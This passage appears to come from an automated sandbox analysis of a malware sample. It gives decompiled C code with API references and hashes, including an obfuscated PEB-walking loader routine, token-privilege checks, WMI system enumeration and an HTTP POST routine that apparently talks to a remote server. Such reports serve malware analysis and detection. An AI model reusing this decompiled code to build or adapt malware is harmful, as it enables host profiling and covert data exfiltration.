								if(_t35 <  *((intOrPtr*)(_t34 + _t38 + 8))) {
									continue;
								} else {
								}
								goto L8;
							}
							 *_t41 =  *_t41 |  *(_t34 + _t38);
						}
						L8:
						_t31 = _t31 + 1;
						_t38 = _t38 + 0x10;
						_t20 =  &(_t41[1]); // 0x1374ff85
					} while (_t31 <  *_t20);
				}
				Sleep(0xa);
				return 1;
			}

APIs

lstrcmpiA.KERNEL32(?,?,00000128,00000000,?,?,?,1000AC0D,?,?), ref: 1000CCF4
Sleep.KERNEL32(0000000A,00000000,?,?,?,1000AC0D,?,?), ref: 1000CD26

Memory Dump Source

Source File: 00000009.00000002.554724800.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.554640599.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Sleeplstrcmpi
String ID:
API String ID: 1261054337-0
Opcode ID: d589c2e27be55aab14665e750e2f3d45a62fba7c08b0dfb6dc3d34da2db7017b
Instruction ID: cde0d477192250e791ba25b7cb0ca9c4b7eae4faf087914376a22588bee842ac
Opcode Fuzzy Hash: d589c2e27be55aab14665e750e2f3d45a62fba7c08b0dfb6dc3d34da2db7017b
Instruction Fuzzy Hash: 21018031600709EFEB10DF69C884D5AB7E5FF843A4725C47AE95A8B215D730E942DB50

Uniqueness

Uniqueness Score: -1.00%

Function 10005E96, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10005E96() {
				intOrPtr _t3;

				_t3 =  *0x1001e684; // 0x2ecfaa0
				 *((intOrPtr*)(_t3 + 0x2c))( *0x1001e6a8, 0xffffffff);
				ExitProcess(0);
			}

0x10005e96
0x10005ea3
0x10005ead

APIs

ExitProcess.KERNEL32(00000000), ref: 10005EAD

Memory Dump Source

Source File: 00000009.00000002.554724800.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.554640599.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 5cd9b7efdf0ac82a49e6ca76f2220a9fceff99eff54594cf8359571d6987a725
Instruction ID: 9fe5a48d1d7df1d44c8ff89900a8b99800cce3c20b8b2062506d45ae6f81fc06
Opcode Fuzzy Hash: 5cd9b7efdf0ac82a49e6ca76f2220a9fceff99eff54594cf8359571d6987a725
Instruction Fuzzy Hash: D4C002712151A1AFEA409BA4CD88F0877A1AB68362F9282A5F5259A1F6CA30D8009B11

Uniqueness

Uniqueness Score: -1.00%

Function 100085EF, Relevance: 1.5, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100085EF() {
				void* _t1;

				_t1 = HeapCreate(0, 0x80000, 0); // executed
				 *0x1001e768 = _t1;
				return _t1;
			}

0x100085f8
0x100085fe
0x10008603

APIs

HeapCreate.KERNEL32(00000000,00080000,00000000,10005FA7), ref: 100085F8

Memory Dump Source

Source File: 00000009.00000002.554724800.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.554640599.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 21e30d703b760380db77e66f3654ad7d37bd304b680c7c4cfdef8daab914962f
Instruction ID: f703af9baad619bee9f37dfa55c6143b3da77678d96310d0b12c6411cce6613a
Opcode Fuzzy Hash: 21e30d703b760380db77e66f3654ad7d37bd304b680c7c4cfdef8daab914962f
Instruction Fuzzy Hash: B9B012B0A8471096F2901B204C86B047550A308B0AF308001F708581D0C6B05104CB14

Uniqueness

Uniqueness Score: -1.00%

Function 1000BA62, Relevance: 1.3, APIs: 1, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E1000BA62(void* __ecx, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				void* _v16;
				char _v20;
				char _v24;
				short _v28;
				char _v32;
				void* _t20;
				intOrPtr* _t21;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr* _t33;
				intOrPtr _t34;
				char _t37;
				union _TOKEN_INFORMATION_CLASS _t44;
				char _t45;
				intOrPtr* _t48;

				_t37 = 0;
				_v28 = 0x500;
				_t45 = 0;
				_v32 = 0;
				_t20 = E1000B946(__ecx);
				_v16 = _t20;
				if(_t20 != 0) {
					_push( &_v24);
					_t44 = 2;
					_t21 = E1000B998(_t44); // executed
					_t48 = _t21;
					_v20 = _t48;
					if(_t48 == 0) {
						L10:
						CloseHandle(_v16);
						if(_t48 != 0) {
							E1000861A( &_v20, _t37);
						}
						return _t45;
					}
					_push( &_v12);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0x220);
					_push(0x20);
					_push(2);
					_push( &_v32);
					_t29 =  *0x1001e68c; // 0x2ecfc68
					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
						goto L10;
					}
					if( *_t48 <= 0) {
						L9:
						_t31 =  *0x1001e68c; // 0x2ecfc68
						 *((intOrPtr*)(_t31 + 0x10))(_v12);
						_t37 = 0;
						goto L10;
					}
					_t9 = _t48 + 4; // 0x4
					_t33 = _t9;
					_v8 = _t33;
					while(1) {
						_push(_v12);
						_push( *_t33);
						_t34 =  *0x1001e68c; // 0x2ecfc68
						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
							break;
						}
						_t37 = _t37 + 1;
						_t33 = _v8 + 8;
						_v8 = _t33;
						if(_t37 <  *_t48) {
							continue;
						}
						goto L9;
					}
					_t45 = 1;
					goto L9;
				}
				return _t20;
			}

APIs

Part of subcall function 1000B946: GetCurrentThread.KERNEL32(00000008,00000000,10000000,00000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B959
Part of subcall function 1000B946: GetLastError.KERNEL32(?,?,1000BA7C,74EC17D9,10000000), ref: 1000B967
Part of subcall function 1000B946: GetCurrentProcess.KERNEL32(00000008,10000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B980

Part of subcall function 1000B998: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9B3
Part of subcall function 1000B998: GetLastError.KERNEL32(?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9BA

CloseHandle.KERNEL32(?,00000000,74EC17D9,10000000), ref: 1000BB06

Memory Dump Source

Source File: 00000009.00000002.554724800.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.554640599.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CurrentErrorLast$CloseHandleInformationProcessThreadToken
String ID:
API String ID: 3752664914-0
Opcode ID: 3029ab77cace5704be6ef2a1eb7c1f1fb731f9b7037353be42344427220f5465
Instruction ID: 211ecb97cd29a0990eca88f75de2d619fb9b913ff1731f7459bcb712159e1349
Opcode Fuzzy Hash: 3029ab77cace5704be6ef2a1eb7c1f1fb731f9b7037353be42344427220f5465
Instruction Fuzzy Hash: A5217F71A00615AFEB00DFA9CC85EAEB7F8EF04380F514069F601E7165D770ED008B51

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02114495, Relevance: .1, Instructions: 140
COMMONCrypto

Download Yara Rule

C-Code - Quality: 60%

			E02114495(signed int __eax, signed int __ebx, signed int __ecx, signed int __edx, signed int __edi, signed int __esi) {
				signed int _v8;
				signed int _t62;
				signed int _t67;
				signed int _t68;
				signed int _t70;
				signed int _t72;
				signed int _t74;
				signed int _t80;
				signed int _t84;
				signed int _t91;
				signed int _t102;
				signed int _t104;
				signed int _t114;
				signed int _t116;
				void* _t121;
				void* _t143;
				signed int* _t147;

				_push(__ecx);
				_push(__edx);
				_push(__edi);
				_push(__esi);
				if( *((intOrPtr*)(__ebx + 0x435571)) != 1) {
					_v8 = __esi;
					_t114 = __edi & 0x00000000 ^ (__esi & 0x00000000 |  *(__ebx + 0x43574e));
					_push(__edx);
					_t62 = __eax & 0x00000000 | __edx & 0x00000000 |  *(_t114 + 0x3c);
					_pop(_t102);
					_t116 =  *((intOrPtr*)(_t62 + _t114 + 0x28)) +  *(__ebx + 0x4350b0);
					_v8 = __ecx;
					_t104 = _t102 & 0x00000000 ^ (__ecx ^ _v8 | _t116);
					_t84 = _v8;
					_v8 = _t84;
					_t118 = _t116 & 0x00000000 | _t84 ^ _v8 |  *(__ebx + 0x4350b0);
					_push(_t143);
					_v8 = __ebx;
					_t80 = _v8;
					_v8 =  *((intOrPtr*)((_t62 & 0x00000000 ^ (_t143 -  *_t147 |  *((_t116 & 0x00000000 | _t84 ^ _v8 |  *(__ebx + 0x4350b0)) + 0x3c))) + _t118 + 0x28)) +  *(__ebx + 0x4350b0);
					_t67 = 0 ^  *( *((intOrPtr*)((_v8 & 0x00000000 | __ebx & 0x00000000 |  *[fs:0x30]) + 0xc)) + 0xc);
					__eflags = _t67;
					_t91 = _t67;
					_t68 = _v8;
					while(1) {
						 *_t35 =  *((intOrPtr*)(_t91 + 0x1c));
						_push(_v8);
						_pop(_t121);
						__eflags = _t68 - _t121;
						if(_t68 == _t121) {
							break;
						}
						__eflags = _t104 - _t121;
						if(__eflags != 0) {
							_t91 =  *(_t91 + 4);
							if(__eflags != 0) {
								continue;
							} else {
								 *((intOrPtr*)(_t80 + 0x435571)) = 1;
								_pop( *_t52);
								_pop( *_t54);
								_pop( *_t56);
								_t70 =  *_t147;
								__eflags = _t70;
								return _t70;
							}
						} else {
							_pop( *_t44);
							_pop( *_t46);
							_t72 = (_t68 & 0x00000000) + _v8;
							__eflags = _t72;
							return _t72;
						}
						goto L9;
					}
					 *_t37 = _t104;
					_push(_v8);
					_pop( *_t39);
					_pop( *_t40);
					_t74 = _t68 & 0x00000000 | _v8;
					__eflags = _t74;
					return _t74;
				} else {
					_pop( *_t2);
					_pop( *_t4);
					return (__eax & 0x00000000) + _t147[1];
				}
				L9:
			}

0x0211449c
0x0211449d
0x0211449e
0x0211449f
0x021144a7
0x021144e1
0x021144f0
0x021144f5
0x021144ff
0x02114501
0x02114506
0x0211450c
0x02114517
0x02114519
0x0211451c
0x0211452b
0x02114530
0x02114553
0x02114565
0x0211456b
0x02114570
0x02114570
0x02114573
0x02114575
0x02114578
0x0211457b
0x0211457e
0x02114581
0x02114582
0x02114584
0x00000000
0x00000000
0x021145cc
0x021145ce
0x02114602
0x02114605
0x00000000
0x0211460b
0x0211460b
0x02114617
0x0211461d
0x02114623
0x02114631
0x02114631
0x02114638
0x02114638
0x021145d0
0x021145d0
0x021145e4
0x021145fb
0x021145fb
0x021145ff
0x021145ff
0x00000000
0x021145ce
0x02114587
0x0211458a
0x0211458d
0x021145b6
0x021145c5
0x021145c5
0x021145c9
0x021144a9
0x021144af
0x021144c3
0x021144de
0x021144de
0x00000000

Memory Dump Source

Source File: 00000009.00000002.552434410.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0479555227218ebb414e8c4145d25bc2b41eb189c0fbb9efb8d710e990c1ccf4
Instruction ID: 0ec9d988624fe4729dcfd7a6451260fdd10fd9de087268b3c0f98f0c9b528c28
Opcode Fuzzy Hash: 0479555227218ebb414e8c4145d25bc2b41eb189c0fbb9efb8d710e990c1ccf4
Instruction Fuzzy Hash: 33512A77D15508EBEB04CF94DA4279DB7B2FF94314F2981A9C845A7280C734AF10EB95

Uniqueness

Uniqueness Score: -1.00%

Function 1000DB3C, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388
memoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E1000DB3C(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E1000D523(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E10008604(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E1000861A( &_v60, 0xfffffffe);
					E1000D5D7( &_v104);
					return _t320;
				}
				_t165 = E100095E1(_t255, 0x536);
				 *_t328 = 0x609;
				_v52 = _t165;
				_t166 = E100095E1(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E100092E5(_t165);
				_v60 = _t322;
				E100085D5( &_v52);
				E100085D5( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E100095E1(_t255, 0x9e4);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E100085D5( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E1000861A( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E100091E3(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E100091E3(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E10008698(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E10008604( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E1000861A(_t136, 0);
								E1000861A( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E100091E3(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E100095E1(_t281, 0x250);
								 *_t329 = 0x4cc;
								_t217 = E100095E1(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E10008604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E100085D5( &_v92);
											E100085D5( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E10009640();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E10008604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E100095E1(_t283, 0x219);
										E10009640( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E100085D5( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E100091E3(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E1000DA20( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E1000861A( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}

APIs

Part of subcall function 1000D523: CoInitializeEx.OLE32(00000000,00000000), ref: 1000D536
Part of subcall function 1000D523: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 1000D547
Part of subcall function 1000D523: CoCreateInstance.OLE32(1001B848,00000000,00000001,1001B858,?), ref: 1000D55E
Part of subcall function 1000D523: SysAllocString.OLEAUT32(00000000), ref: 1000D569
Part of subcall function 1000D523: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 1000D594

Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612

SysAllocString.OLEAUT32(00000000), ref: 1000DBE5
SysAllocString.OLEAUT32(00000000), ref: 1000DBF9
SysFreeString.OLEAUT32(?), ref: 1000DF82
SysFreeString.OLEAUT32(?), ref: 1000DF8B

Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660

Strings

FALSE, xrefs: 1000DDAE
TRUE, xrefs: 1000DDA7

Memory Dump Source

Source File: 00000009.00000002.554724800.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.554640599.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: String$Alloc$Free$HeapInitialize$BlanketCreateInstanceProxySecurity
String ID: FALSE$TRUE
API String ID: 224402418-1412513891
Opcode ID: 95ff9ab5d061d96dc60c0cf74fe266a414f7d2914be56b1a19689f674a06e878
Instruction ID: 5411e9e7cadc0f68074cac65ab41d21575f1dfdd33ecf7b2672d11ac1b24c815
Opcode Fuzzy Hash: 95ff9ab5d061d96dc60c0cf74fe266a414f7d2914be56b1a19689f674a06e878
Instruction Fuzzy Hash: 13E16375D002199FEB15EFE4C885EEEBBB9FF48380F10415AF505AB259DB31AA01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1000E668, Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 305
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E1000E668(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
				char _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				int _v76;
				void* _v80;
				intOrPtr _v100;
				int _v104;
				void* _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char* _v120;
				void _v124;
				char _v140;
				void _v396;
				void _v652;
				intOrPtr _t105;
				intOrPtr _t113;
				intOrPtr* _t115;
				intOrPtr _t118;
				intOrPtr _t121;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t131;
				char _t133;
				intOrPtr _t136;
				char _t138;
				char _t139;
				intOrPtr _t141;
				intOrPtr _t147;
				intOrPtr _t154;
				intOrPtr _t158;
				intOrPtr _t162;
				intOrPtr _t164;
				intOrPtr _t166;
				intOrPtr _t172;
				intOrPtr _t176;
				void* _t183;
				void* _t185;
				intOrPtr _t186;
				char _t195;
				intOrPtr _t203;
				intOrPtr _t204;
				signed int _t209;
				void _t212;
				intOrPtr _t213;
				void* _t214;
				intOrPtr _t216;
				char _t217;
				intOrPtr _t218;
				signed int _t219;
				signed int _t220;
				void* _t221;

				_v40 = _v40 & 0x00000000;
				_v24 = 4;
				_v36 = 1;
				_t214 = __edx;
				memset( &_v396, 0, 0x100);
				memset( &_v652, 0, 0x100);
				_v64 = E100095C7(0x85b);
				_v60 = E100095C7(0xdc9);
				_v56 = E100095C7(0x65d);
				_v52 = E100095C7(0xdd3);
				_t105 = E100095C7(0xb74);
				_v44 = _v44 & 0;
				_t212 = 0x3c;
				_v48 = _t105;
				memset( &_v124, 0, 0x100);
				_v116 = 0x10;
				_v120 =  &_v140;
				_v124 = _t212;
				_v108 =  &_v396;
				_v104 = 0x100;
				_v80 =  &_v652;
				_push( &_v124);
				_push(0);
				_v76 = 0x100;
				_push(E1000C379(_t214));
				_t113 =  *0x1001e6a4; // 0x0
				_push(_t214);
				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
					_t209 = 0;
					_v20 = 0;
					do {
						_t115 =  *0x1001e6a4; // 0x0
						_v12 = 0x8404f700;
						_t213 =  *_t115( *0x1001e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
						if(_t213 != 0) {
							_t195 = 3;
							_t185 = 4;
							_v8 = _t195;
							_t118 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
							_v8 = 0x3a98;
							_t121 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
							_v8 = 0x493e0;
							_t124 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
							_v8 = 0x493e0;
							_t127 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
							_t131 =  *0x1001e6a4; // 0x0
							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
							if(_a24 != 0) {
								E1000980C(_a24);
							}
							if(_t186 != 0) {
								_t133 = 0x8484f700;
								if(_v112 != 4) {
									_t133 = _v12;
								}
								_t136 =  *0x1001e6a4; // 0x0
								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
								_v8 = _t216;
								if(_a24 != 0) {
									E1000980C(_a24);
								}
								if(_t216 != 0) {
									_t138 = 4;
									if(_v112 != _t138) {
										L19:
										_t139 = E100095C7(0x777);
										_t217 = _t139;
										_v12 = _t217;
										_t141 =  *0x1001e6a4; // 0x0
										_t218 = _v8;
										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E1000C379(_t217), _a4, _a8);
										E100085C2( &_v12);
										if(_a24 != 0) {
											E1000980C(_a24);
										}
										if(_v28 != 0) {
											L28:
											_v24 = 8;
											_push(0);
											_v32 = 0;
											_v28 = 0;
											_push( &_v24);
											_push( &_v32);
											_t147 =  *0x1001e6a4; // 0x0
											_push(0x13);
											_push(_t218);
											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
												_t219 = E10009749( &_v32);
												if(_t219 == 0xc8) {
													 *_a20 = _v8;
													 *_a12 = _t213;
													 *_a16 = _t186;
													return 0;
												}
												_t220 =  ~_t219;
												L32:
												_t154 =  *0x1001e6a4; // 0x0
												 *((intOrPtr*)(_t154 + 8))(_v8);
												L33:
												if(_t186 != 0) {
													_t158 =  *0x1001e6a4; // 0x0
													 *((intOrPtr*)(_t158 + 8))(_t186);
												}
												if(_t213 != 0) {
													_t203 =  *0x1001e6a4; // 0x0
													 *((intOrPtr*)(_t203 + 8))(_t213);
												}
												return _t220;
											}
											GetLastError();
											_t220 = 0xfffffff8;
											goto L32;
										} else {
											GetLastError();
											_t162 =  *0x1001e6a4; // 0x0
											 *((intOrPtr*)(_t162 + 8))(_t218);
											_t218 = 0;
											goto L23;
										}
									}
									_v12 = _t138;
									_push( &_v12);
									_push( &_v16);
									_t172 =  *0x1001e6a4; // 0x0
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
										L18:
										GetLastError();
										goto L19;
									}
									_v16 = _v16 | 0x00003380;
									_push(4);
									_push( &_v16);
									_t176 =  *0x1001e6a4; // 0x0
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
										goto L19;
									}
									goto L18;
								} else {
									GetLastError();
									L23:
									_t164 =  *0x1001e6a4; // 0x0
									 *((intOrPtr*)(_t164 + 8))(_t186);
									_t186 = 0;
									goto L24;
								}
							} else {
								GetLastError();
								L24:
								_t166 =  *0x1001e6a4; // 0x0
								 *((intOrPtr*)(_t166 + 8))(_t213);
								_t213 = 0;
								goto L25;
							}
						}
						GetLastError();
						L25:
						_t204 = _t218;
						_t209 = _v20 + 1;
						_v20 = _t209;
					} while (_t209 < 2);
					_v8 = _t218;
					if(_t204 != 0) {
						goto L28;
					}
					_t220 = 0xfffffffe;
					goto L33;
				}
				_t183 = 0xfffffffc;
				return _t183;
			}

APIs

memset.MSVCRT ref: 1000E69A
memset.MSVCRT ref: 1000E6AB
memset.MSVCRT ref: 1000E700
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 1000E785

Strings

POST, xrefs: 1000E84B

Memory Dump Source

Source File: 00000009.00000002.554724800.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.554640599.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memset$ErrorLast
String ID: POST
API String ID: 2570506013-1814004025
Opcode ID: 9666fa5b7544119ad2a1acce946c7c4cd061c2ef1cd09bcb1a5d5842fa234375
Instruction ID: 0700470c0a68c42d93125f8ed8f5d74d0b9e7f5cef555f12c6cb43bca8eeeaa5
